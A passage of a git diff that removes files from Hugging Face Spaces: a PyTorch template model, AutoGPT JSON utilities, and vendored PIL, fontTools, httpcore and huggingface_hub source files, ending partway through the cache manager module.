as its dataset. - if is_train: - parser.add_argument('--lambda_regression', type=float, default=1.0, help='weight for the regression loss') # You can define new arguments for this model. - - return parser - - def __init__(self, opt): - """Initialize this model class. 
- - Parameters: - opt -- training/test options - - A few things can be done here. - - (required) call the initialization function of BaseModel - - define loss function, visualization images, model names, and optimizers - """ - BaseModel.__init__(self, opt) # call the initialization method of BaseModel - # specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk. - self.loss_names = ['loss_G'] - # specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images. - self.visual_names = ['data_A', 'data_B', 'output'] - # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks. - # you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them. - self.model_names = ['G'] - # define networks; you can use opt.isTrain to specify different behaviors for training and test. - self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, gpu_ids=self.gpu_ids) - if self.isTrain: # only defined during training time - # define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss. - # We also provide a GANLoss class "networks.GANLoss". self.criterionGAN = networks.GANLoss().to(self.device) - self.criterionLoss = torch.nn.L1Loss() - # define and initialize optimizers. You can define one optimizer for each network. - # If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example. - self.optimizer = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999)) - self.optimizers = [self.optimizer] - - # Our program will automatically call to define schedulers, load networks, and print networks - - def set_input(self, input): - """Unpack input data from the dataloader and perform necessary pre-processing steps. - - Parameters: - input: a dictionary that contains the data itself and its metadata information. - """ - AtoB = self.opt.direction == 'AtoB' # use to swap data_A and data_B - self.data_A = input['A' if AtoB else 'B'].to(self.device) # get image data A - self.data_B = input['B' if AtoB else 'A'].to(self.device) # get image data B - self.image_paths = input['A_paths' if AtoB else 'B_paths'] # get image paths - - def forward(self): - """Run forward pass. This will be called by both functions and .""" - self.output = self.netG(self.data_A) # generate output image given the input data_A - - def backward(self): - """Calculate losses, gradients, and update network weights; called in every training iteration""" - # caculate the intermediate results if necessary; here self.output has been computed during function - # calculate loss given the input and intermediate results - self.loss_G = self.criterionLoss(self.output, self.data_B) * self.opt.lambda_regression - self.loss_G.backward() # calculate gradients of network G w.r.t. 
loss_G - - def optimize_parameters(self): - """Update network weights; it will be called in every training iteration.""" - self.forward() # first call forward to calculate intermediate results - self.optimizer.zero_grad() # clear network G's existing gradients - self.backward() # calculate gradients for network G - self.optimizer.step() # update gradients for network G diff --git a/spaces/kinensake/quanquan/lm_scorer/models/__init__.py b/spaces/kinensake/quanquan/lm_scorer/models/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py b/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py deleted file mode 100644 index eb9bb687750460fed2f4547b67e41f8e8c877a41..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/autogpt/json_utils/utilities.py +++ /dev/null @@ -1,54 +0,0 @@ -"""Utilities for the json_fixes package.""" -import json -import re - -from jsonschema import Draft7Validator - -from autogpt.config import Config -from autogpt.logs import logger - -CFG = Config() - - -def extract_char_position(error_message: str) -> int: - """Extract the character position from the JSONDecodeError message. - - Args: - error_message (str): The error message from the JSONDecodeError - exception. - - Returns: - int: The character position. - """ - - char_pattern = re.compile(r"\(char (\d+)\)") - if match := char_pattern.search(error_message): - return int(match[1]) - else: - raise ValueError("Character position not found in the error message.") - - -def validate_json(json_object: object, schema_name: object) -> object: - """ - :type schema_name: object - :param schema_name: - :type json_object: object - """ - with open(f"autogpt/json_utils/{schema_name}.json", "r") as f: - schema = json.load(f) - validator = Draft7Validator(schema) - - if errors := sorted(validator.iter_errors(json_object), key=lambda e: e.path): - logger.error("The JSON object is invalid.") - if CFG.debug_mode: - logger.error( - json.dumps(json_object, indent=4) - ) # Replace 'json_object' with the variable containing the JSON data - logger.error("The following issues were found:") - - for error in errors: - logger.error(f"Error: {error.message}") - elif CFG.debug_mode: - print("The JSON object is valid.") - - return json_object diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py deleted file mode 100644 index 70120031797c2493c0ce878c13c3fd3d5554c354..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/PIL/ImageChops.py +++ /dev/null @@ -1,303 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# standard channel operations -# -# History: -# 1996-03-24 fl Created -# 1996-08-13 fl Added logical operations (for "1" images) -# 2000-10-12 fl Added offset method (from Image.py) -# -# Copyright (c) 1997-2000 by Secret Labs AB -# Copyright (c) 1996-2000 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - -from . import Image - - -def constant(image, value): - """Fill a channel with a given grey level. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.new("L", image.size, value) - - -def duplicate(image): - """Copy a channel. Alias for :py:meth:`PIL.Image.Image.copy`. 
- - :rtype: :py:class:`~PIL.Image.Image` - """ - - return image.copy() - - -def invert(image): - """ - Invert an image (channel). :: - - out = MAX - image - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image.load() - return image._new(image.im.chop_invert()) - - -def lighter(image1, image2): - """ - Compares the two images, pixel by pixel, and returns a new image containing - the lighter values. :: - - out = max(image1, image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_lighter(image2.im)) - - -def darker(image1, image2): - """ - Compares the two images, pixel by pixel, and returns a new image containing - the darker values. :: - - out = min(image1, image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_darker(image2.im)) - - -def difference(image1, image2): - """ - Returns the absolute value of the pixel-by-pixel difference between the two - images. :: - - out = abs(image1 - image2) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_difference(image2.im)) - - -def multiply(image1, image2): - """ - Superimposes two images on top of each other. - - If you multiply an image with a solid black image, the result is black. If - you multiply with a solid white image, the image is unaffected. :: - - out = image1 * image2 / MAX - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_multiply(image2.im)) - - -def screen(image1, image2): - """ - Superimposes two inverted images on top of each other. :: - - out = MAX - ((MAX - image1) * (MAX - image2) / MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_screen(image2.im)) - - -def soft_light(image1, image2): - """ - Superimposes two images on top of each other using the Soft Light algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_soft_light(image2.im)) - - -def hard_light(image1, image2): - """ - Superimposes two images on top of each other using the Hard Light algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_hard_light(image2.im)) - - -def overlay(image1, image2): - """ - Superimposes two images on top of each other using the Overlay algorithm - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_overlay(image2.im)) - - -def add(image1, image2, scale=1.0, offset=0): - """ - Adds two images, dividing the result by scale and adding the - offset. If omitted, scale defaults to 1.0, and offset to 0.0. :: - - out = ((image1 + image2) / scale + offset) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_add(image2.im, scale, offset)) - - -def subtract(image1, image2, scale=1.0, offset=0): - """ - Subtracts two images, dividing the result by scale and adding the offset. - If omitted, scale defaults to 1.0, and offset to 0.0. :: - - out = ((image1 - image2) / scale + offset) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_subtract(image2.im, scale, offset)) - - -def add_modulo(image1, image2): - """Add two images, without clipping the result. 
:: - - out = ((image1 + image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_add_modulo(image2.im)) - - -def subtract_modulo(image1, image2): - """Subtract two images, without clipping the result. :: - - out = ((image1 - image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_subtract_modulo(image2.im)) - - -def logical_and(image1, image2): - """Logical AND between two images. - - Both of the images must have mode "1". If you would like to perform a - logical AND on an image with a mode other than "1", try - :py:meth:`~PIL.ImageChops.multiply` instead, using a black-and-white mask - as the second image. :: - - out = ((image1 and image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_and(image2.im)) - - -def logical_or(image1, image2): - """Logical OR between two images. - - Both of the images must have mode "1". :: - - out = ((image1 or image2) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_or(image2.im)) - - -def logical_xor(image1, image2): - """Logical XOR between two images. - - Both of the images must have mode "1". :: - - out = ((bool(image1) != bool(image2)) % MAX) - - :rtype: :py:class:`~PIL.Image.Image` - """ - - image1.load() - image2.load() - return image1._new(image1.im.chop_xor(image2.im)) - - -def blend(image1, image2, alpha): - """Blend images using constant transparency weight. Alias for - :py:func:`PIL.Image.blend`. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.blend(image1, image2, alpha) - - -def composite(image1, image2, mask): - """Create composite using transparency mask. Alias for - :py:func:`PIL.Image.composite`. - - :rtype: :py:class:`~PIL.Image.Image` - """ - - return Image.composite(image1, image2, mask) - - -def offset(image, xoffset, yoffset=None): - """Returns a copy of the image where data has been offset by the given - distances. Data wraps around the edges. If ``yoffset`` is omitted, it - is assumed to be equal to ``xoffset``. - - :param image: Input image. - :param xoffset: The horizontal distance. - :param yoffset: The vertical distance. If omitted, both - distances are set to the same value. - :rtype: :py:class:`~PIL.Image.Image` - """ - - if yoffset is None: - yoffset = xoffset - image.load() - return image._new(image.im.offset(xoffset, yoffset)) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py deleted file mode 100644 index 7018f27a7c8bc15935997c91ba36864c230dee8e..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/scaleUpem.py +++ /dev/null @@ -1,395 +0,0 @@ -"""Change the units-per-EM of a font. - -AAT and Graphite tables are not supported. 
CFF/CFF2 fonts -are de-subroutinized.""" - - -from fontTools.ttLib.ttVisitor import TTVisitor -import fontTools.ttLib as ttLib -import fontTools.ttLib.tables.otBase as otBase -import fontTools.ttLib.tables.otTables as otTables -from fontTools.cffLib import VarStoreData -import fontTools.cffLib.specializer as cffSpecializer -from fontTools.varLib import builder # for VarData.calculateNumShorts -from fontTools.misc.fixedTools import otRound -from fontTools.ttLib.tables._g_l_y_f import VarComponentFlags - - -__all__ = ["scale_upem", "ScalerVisitor"] - - -class ScalerVisitor(TTVisitor): - def __init__(self, scaleFactor): - self.scaleFactor = scaleFactor - - def scale(self, v): - return otRound(v * self.scaleFactor) - - -@ScalerVisitor.register_attrs( - ( - (ttLib.getTableClass("head"), ("unitsPerEm", "xMin", "yMin", "xMax", "yMax")), - (ttLib.getTableClass("post"), ("underlinePosition", "underlineThickness")), - (ttLib.getTableClass("VORG"), ("defaultVertOriginY")), - ( - ttLib.getTableClass("hhea"), - ( - "ascent", - "descent", - "lineGap", - "advanceWidthMax", - "minLeftSideBearing", - "minRightSideBearing", - "xMaxExtent", - "caretOffset", - ), - ), - ( - ttLib.getTableClass("vhea"), - ( - "ascent", - "descent", - "lineGap", - "advanceHeightMax", - "minTopSideBearing", - "minBottomSideBearing", - "yMaxExtent", - "caretOffset", - ), - ), - ( - ttLib.getTableClass("OS/2"), - ( - "xAvgCharWidth", - "ySubscriptXSize", - "ySubscriptYSize", - "ySubscriptXOffset", - "ySubscriptYOffset", - "ySuperscriptXSize", - "ySuperscriptYSize", - "ySuperscriptXOffset", - "ySuperscriptYOffset", - "yStrikeoutSize", - "yStrikeoutPosition", - "sTypoAscender", - "sTypoDescender", - "sTypoLineGap", - "usWinAscent", - "usWinDescent", - "sxHeight", - "sCapHeight", - ), - ), - ( - otTables.ValueRecord, - ("XAdvance", "YAdvance", "XPlacement", "YPlacement"), - ), # GPOS - (otTables.Anchor, ("XCoordinate", "YCoordinate")), # GPOS - (otTables.CaretValue, ("Coordinate")), # GDEF - (otTables.BaseCoord, ("Coordinate")), # BASE - (otTables.MathValueRecord, ("Value")), # MATH - (otTables.ClipBox, ("xMin", "yMin", "xMax", "yMax")), # COLR - ) -) -def visit(visitor, obj, attr, value): - setattr(obj, attr, visitor.scale(value)) - - -@ScalerVisitor.register_attr( - (ttLib.getTableClass("hmtx"), ttLib.getTableClass("vmtx")), "metrics" -) -def visit(visitor, obj, attr, metrics): - for g in metrics: - advance, lsb = metrics[g] - metrics[g] = visitor.scale(advance), visitor.scale(lsb) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("VMTX"), "VOriginRecords") -def visit(visitor, obj, attr, VOriginRecords): - for g in VOriginRecords: - VOriginRecords[g] = visitor.scale(VOriginRecords[g]) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("glyf"), "glyphs") -def visit(visitor, obj, attr, glyphs): - for g in glyphs.values(): - for attr in ("xMin", "xMax", "yMin", "yMax"): - v = getattr(g, attr, None) - if v is not None: - setattr(g, attr, visitor.scale(v)) - - if g.isComposite(): - for component in g.components: - component.x = visitor.scale(component.x) - component.y = visitor.scale(component.y) - continue - - if g.isVarComposite(): - for component in g.components: - for attr in ("translateX", "translateY", "tCenterX", "tCenterY"): - v = getattr(component.transform, attr) - setattr(component.transform, attr, visitor.scale(v)) - continue - - if hasattr(g, "coordinates"): - coordinates = g.coordinates - for i, (x, y) in enumerate(coordinates): - coordinates[i] = visitor.scale(x), visitor.scale(y) - - 
-@ScalerVisitor.register_attr(ttLib.getTableClass("gvar"), "variations") -def visit(visitor, obj, attr, variations): - - # VarComposites are a pain to handle :-( - glyfTable = visitor.font["glyf"] - - for glyphName, varlist in variations.items(): - glyph = glyfTable[glyphName] - isVarComposite = glyph.isVarComposite() - for var in varlist: - coordinates = var.coordinates - - if not isVarComposite: - for i, xy in enumerate(coordinates): - if xy is None: - continue - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - continue - - # VarComposite glyph - - i = 0 - for component in glyph.components: - if component.flags & VarComponentFlags.AXES_HAVE_VARIATION: - i += len(component.location) - if component.flags & ( - VarComponentFlags.HAVE_TRANSLATE_X - | VarComponentFlags.HAVE_TRANSLATE_Y - ): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - i += 1 - if component.flags & VarComponentFlags.HAVE_ROTATION: - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_SCALE_X | VarComponentFlags.HAVE_SCALE_Y - ): - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_SKEW_X | VarComponentFlags.HAVE_SKEW_Y - ): - i += 1 - if component.flags & ( - VarComponentFlags.HAVE_TCENTER_X | VarComponentFlags.HAVE_TCENTER_Y - ): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - i += 1 - - # Phantom points - assert i + 4 == len(coordinates) - for i in range(i, len(coordinates)): - xy = coordinates[i] - coordinates[i] = visitor.scale(xy[0]), visitor.scale(xy[1]) - - -@ScalerVisitor.register_attr(ttLib.getTableClass("kern"), "kernTables") -def visit(visitor, obj, attr, kernTables): - for table in kernTables: - kernTable = table.kernTable - for k in kernTable.keys(): - kernTable[k] = visitor.scale(kernTable[k]) - - -def _cff_scale(visitor, args): - for i, arg in enumerate(args): - if not isinstance(arg, list): - if not isinstance(arg, bytes): - args[i] = visitor.scale(arg) - else: - num_blends = arg[-1] - _cff_scale(visitor, arg) - arg[-1] = num_blends - - -@ScalerVisitor.register_attr( - (ttLib.getTableClass("CFF "), ttLib.getTableClass("CFF2")), "cff" -) -def visit(visitor, obj, attr, cff): - cff.desubroutinize() - topDict = cff.topDictIndex[0] - varStore = getattr(topDict, "VarStore", None) - getNumRegions = varStore.getNumRegions if varStore is not None else None - privates = set() - for fontname in cff.keys(): - font = cff[fontname] - cs = font.CharStrings - for g in font.charset: - c, _ = cs.getItemAndSelector(g) - privates.add(c.private) - - commands = cffSpecializer.programToCommands( - c.program, getNumRegions=getNumRegions - ) - for op, args in commands: - if op == "vsindex": - continue - _cff_scale(visitor, args) - c.program[:] = cffSpecializer.commandsToProgram(commands) - - # Annoying business of scaling numbers that do not matter whatsoever - - for attr in ( - "UnderlinePosition", - "UnderlineThickness", - "FontBBox", - "StrokeWidth", - ): - value = getattr(topDict, attr, None) - if value is None: - continue - if isinstance(value, list): - _cff_scale(visitor, value) - else: - setattr(topDict, attr, visitor.scale(value)) - - for i in range(6): - topDict.FontMatrix[i] /= visitor.scaleFactor - - for private in privates: - for attr in ( - "BlueValues", - "OtherBlues", - "FamilyBlues", - "FamilyOtherBlues", - # "BlueScale", - # "BlueShift", - # "BlueFuzz", - "StdHW", - "StdVW", - "StemSnapH", - "StemSnapV", - "defaultWidthX", - "nominalWidthX", - ): - value = getattr(private, attr, None) - if value is None: - continue - 
if isinstance(value, list): - _cff_scale(visitor, value) - else: - setattr(private, attr, visitor.scale(value)) - - -# ItemVariationStore - - -@ScalerVisitor.register(otTables.VarData) -def visit(visitor, varData): - for item in varData.Item: - for i, v in enumerate(item): - item[i] = visitor.scale(v) - varData.calculateNumShorts() - - -# COLRv1 - - -def _setup_scale_paint(paint, scale): - if -2 <= scale <= 2 - (1 >> 14): - paint.Format = otTables.PaintFormat.PaintScaleUniform - paint.scale = scale - return - - transform = otTables.Affine2x3() - transform.populateDefaults() - transform.xy = transform.yx = transform.dx = transform.dy = 0 - transform.xx = transform.yy = scale - - paint.Format = otTables.PaintFormat.PaintTransform - paint.Transform = transform - - -@ScalerVisitor.register(otTables.BaseGlyphPaintRecord) -def visit(visitor, record): - oldPaint = record.Paint - - scale = otTables.Paint() - _setup_scale_paint(scale, visitor.scaleFactor) - scale.Paint = oldPaint - - record.Paint = scale - - return True - - -@ScalerVisitor.register(otTables.Paint) -def visit(visitor, paint): - if paint.Format != otTables.PaintFormat.PaintGlyph: - return True - - newPaint = otTables.Paint() - newPaint.Format = paint.Format - newPaint.Paint = paint.Paint - newPaint.Glyph = paint.Glyph - del paint.Paint - del paint.Glyph - - _setup_scale_paint(paint, 1 / visitor.scaleFactor) - paint.Paint = newPaint - - visitor.visit(newPaint.Paint) - - return False - - -def scale_upem(font, new_upem): - """Change the units-per-EM of font to the new value.""" - upem = font["head"].unitsPerEm - visitor = ScalerVisitor(new_upem / upem) - visitor.visit(font) - - -def main(args=None): - """Change the units-per-EM of fonts""" - - if args is None: - import sys - - args = sys.argv[1:] - - from fontTools.ttLib import TTFont - from fontTools.misc.cliTools import makeOutputFileName - import argparse - - parser = argparse.ArgumentParser( - "fonttools ttLib.scaleUpem", description="Change the units-per-EM of fonts" - ) - parser.add_argument("font", metavar="font", help="Font file.") - parser.add_argument( - "new_upem", metavar="new-upem", help="New units-per-EM integer value." - ) - parser.add_argument( - "--output-file", metavar="path", default=None, help="Output file." 
- ) - - options = parser.parse_args(args) - - font = TTFont(options.font) - new_upem = int(options.new_upem) - output_file = ( - options.output_file - if options.output_file is not None - else makeOutputFileName(options.font, overWrite=True, suffix="-scaled") - ) - - scale_upem(font, new_upem) - - print("Writing %s" % output_file) - font.save(output_file) - - -if __name__ == "__main__": - import sys - - sys.exit(main()) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py deleted file mode 100644 index 111c700710e56f1f92703b212b530267313293ba..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/J_S_T_F_.py +++ /dev/null @@ -1,5 +0,0 @@ -from .otBase import BaseTTXConverter - - -class table_J_S_T_F_(BaseTTXConverter): - pass diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py deleted file mode 100644 index c99c5a67945b8a3a3544d481e979c791ab45fe23..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/httpcore/_ssl.py +++ /dev/null @@ -1,9 +0,0 @@ -import ssl - -import certifi - - -def default_ssl_context() -> ssl.SSLContext: - context = ssl.create_default_context() - context.load_verify_locations(certifi.where()) - return context diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py deleted file mode 100644 index 3e1443a78945ea55725f75cdbfa7a17091e2d8b1..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/huggingface_hub/utils/_cache_manager.py +++ /dev/null @@ -1,810 +0,0 @@ -# coding=utf-8 -# Copyright 2022-present, the HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Contains utilities to manage the HF cache directory.""" -import os -import shutil -import time -from collections import defaultdict -from dataclasses import dataclass -from pathlib import Path -from typing import Dict, FrozenSet, List, Optional, Set, Union - -from ..constants import HUGGINGFACE_HUB_CACHE -from . 
import logging -from ._typing import Literal - - -logger = logging.get_logger(__name__) - -REPO_TYPE_T = Literal["model", "dataset", "space"] - - -class CacheNotFound(Exception): - """Exception thrown when the Huggingface cache is not found.""" - - cache_dir = Union[str, Path] - - def __init__(self, msg: str, cache_dir: Union[str, Path], *args, **kwargs): - super().__init__(msg, *args, **kwargs) - self.cache_dir = cache_dir - - -class CorruptedCacheException(Exception): - """Exception for any unexpected structure in the Huggingface cache-system.""" - - -@dataclass(frozen=True) -class CachedFileInfo: - """Frozen data structure holding information about a single cached file. - - Args: - file_name (`str`): - Name of the file. Example: `config.json`. - file_path (`Path`): - Path of the file in the `snapshots` directory. The file path is a symlink - referring to a blob in the `blobs` folder. - blob_path (`Path`): - Path of the blob file. This is equivalent to `file_path.resolve()`. - size_on_disk (`int`): - Size of the blob file in bytes. - blob_last_accessed (`float`): - Timestamp of the last time the blob file has been accessed (from any - revision). - blob_last_modified (`float`): - Timestamp of the last time the blob file has been modified/created. - - - - `blob_last_accessed` and `blob_last_modified` reliability can depend on the OS you - are using. See [python documentation](https://docs.python.org/3/library/os.html#os.stat_result) - for more details. - - - """ - - file_name: str - file_path: Path - blob_path: Path - size_on_disk: int - - blob_last_accessed: float - blob_last_modified: float - - @property - def blob_last_accessed_str(self) -> str: - """ - (property) Timestamp of the last time the blob file has been accessed (from any - revision), returned as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.blob_last_accessed) - - @property - def blob_last_modified_str(self) -> str: - """ - (property) Timestamp of the last time the blob file has been modified, returned - as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.blob_last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Size of the blob file as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - -@dataclass(frozen=True) -class CachedRevisionInfo: - """Frozen data structure holding information about a revision. - - A revision correspond to a folder in the `snapshots` folder and is populated with - the exact tree structure as the repo on the Hub but contains only symlinks. A - revision can be either referenced by 1 or more `refs` or be "detached" (no refs). - - Args: - commit_hash (`str`): - Hash of the revision (unique). - Example: `"9338f7b671827df886678df2bdd7cc7b4f36dffd"`. - snapshot_path (`Path`): - Path to the revision directory in the `snapshots` folder. It contains the - exact tree structure as the repo on the Hub. - files: (`FrozenSet[CachedFileInfo]`): - Set of [`~CachedFileInfo`] describing all files contained in the snapshot. - refs (`FrozenSet[str]`): - Set of `refs` pointing to this revision. If the revision has no `refs`, it - is considered detached. - Example: `{"main", "2.4.0"}` or `{"refs/pr/1"}`. - size_on_disk (`int`): - Sum of the blob file sizes that are symlink-ed by the revision. - last_modified (`float`): - Timestamp of the last time the revision has been created/modified. 
- - - - `last_accessed` cannot be determined correctly on a single revision as blob files - are shared across revisions. - - - - - - `size_on_disk` is not necessarily the sum of all file sizes because of possible - duplicated files. Besides, only blobs are taken into account, not the (negligible) - size of folders and symlinks. - - - """ - - commit_hash: str - snapshot_path: Path - size_on_disk: int - files: FrozenSet[CachedFileInfo] - refs: FrozenSet[str] - - last_modified: float - - @property - def last_modified_str(self) -> str: - """ - (property) Timestamp of the last time the revision has been modified, returned - as a human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of the blob file sizes as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - @property - def nb_files(self) -> int: - """ - (property) Total number of files in the revision. - """ - return len(self.files) - - -@dataclass(frozen=True) -class CachedRepoInfo: - """Frozen data structure holding information about a cached repository. - - Args: - repo_id (`str`): - Repo id of the repo on the Hub. Example: `"google/fleurs"`. - repo_type (`Literal["dataset", "model", "space"]`): - Type of the cached repo. - repo_path (`Path`): - Local path to the cached repo. - size_on_disk (`int`): - Sum of the blob file sizes in the cached repo. - nb_files (`int`): - Total number of blob files in the cached repo. - revisions (`FrozenSet[CachedRevisionInfo]`): - Set of [`~CachedRevisionInfo`] describing all revisions cached in the repo. - last_accessed (`float`): - Timestamp of the last time a blob file of the repo has been accessed. - last_modified (`float`): - Timestamp of the last time a blob file of the repo has been modified/created. - - - - `size_on_disk` is not necessarily the sum of all revisions sizes because of - duplicated files. Besides, only blobs are taken into account, not the (negligible) - size of folders and symlinks. - - - - - - `last_accessed` and `last_modified` reliability can depend on the OS you are using. - See [python documentation](https://docs.python.org/3/library/os.html#os.stat_result) - for more details. - - - """ - - repo_id: str - repo_type: REPO_TYPE_T - repo_path: Path - size_on_disk: int - nb_files: int - revisions: FrozenSet[CachedRevisionInfo] - - last_accessed: float - last_modified: float - - @property - def last_accessed_str(self) -> str: - """ - (property) Last time a blob file of the repo has been accessed, returned as a - human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_accessed) - - @property - def last_modified_str(self) -> str: - """ - (property) Last time a blob file of the repo has been modified, returned as a - human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of the blob file sizes as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - @property - def refs(self) -> Dict[str, CachedRevisionInfo]: - """ - (property) Mapping between `refs` and revision data structures. - """ - return {ref: revision for revision in self.revisions for ref in revision.refs} - - -@dataclass(frozen=True) -class DeleteCacheStrategy: - """Frozen data structure holding the strategy to delete cached revisions. 
- - This object is not meant to be instantiated programmatically but to be returned by - [`~utils.HFCacheInfo.delete_revisions`]. See documentation for usage example. - - Args: - expected_freed_size (`float`): - Expected freed size once strategy is executed. - blobs (`FrozenSet[Path]`): - Set of blob file paths to be deleted. - refs (`FrozenSet[Path]`): - Set of reference file paths to be deleted. - repos (`FrozenSet[Path]`): - Set of entire repo paths to be deleted. - snapshots (`FrozenSet[Path]`): - Set of snapshots to be deleted (directory of symlinks). - """ - - expected_freed_size: int - blobs: FrozenSet[Path] - refs: FrozenSet[Path] - repos: FrozenSet[Path] - snapshots: FrozenSet[Path] - - @property - def expected_freed_size_str(self) -> str: - """ - (property) Expected size that will be freed as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.expected_freed_size) - - def execute(self) -> None: - """Execute the defined strategy. - - - - If this method is interrupted, the cache might get corrupted. Deletion order is - implemented so that references and symlinks are deleted before the actual blob - files. - - - - - - This method is irreversible. If executed, cached files are erased and must be - downloaded again. - - - """ - # Deletion order matters. Blobs are deleted in last so that the user can't end - # up in a state where a `ref`` refers to a missing snapshot or a snapshot - # symlink refers to a deleted blob. - - # Delete entire repos - for path in self.repos: - _try_delete_path(path, path_type="repo") - - # Delete snapshot directories - for path in self.snapshots: - _try_delete_path(path, path_type="snapshot") - - # Delete refs files - for path in self.refs: - _try_delete_path(path, path_type="ref") - - # Delete blob files - for path in self.blobs: - _try_delete_path(path, path_type="blob") - - logger.info(f"Cache deletion done. Saved {self.expected_freed_size_str}.") - - -@dataclass(frozen=True) -class HFCacheInfo: - """Frozen data structure holding information about the entire cache-system. - - This data structure is returned by [`scan_cache_dir`] and is immutable. - - Args: - size_on_disk (`int`): - Sum of all valid repo sizes in the cache-system. - repos (`FrozenSet[CachedRepoInfo]`): - Set of [`~CachedRepoInfo`] describing all valid cached repos found on 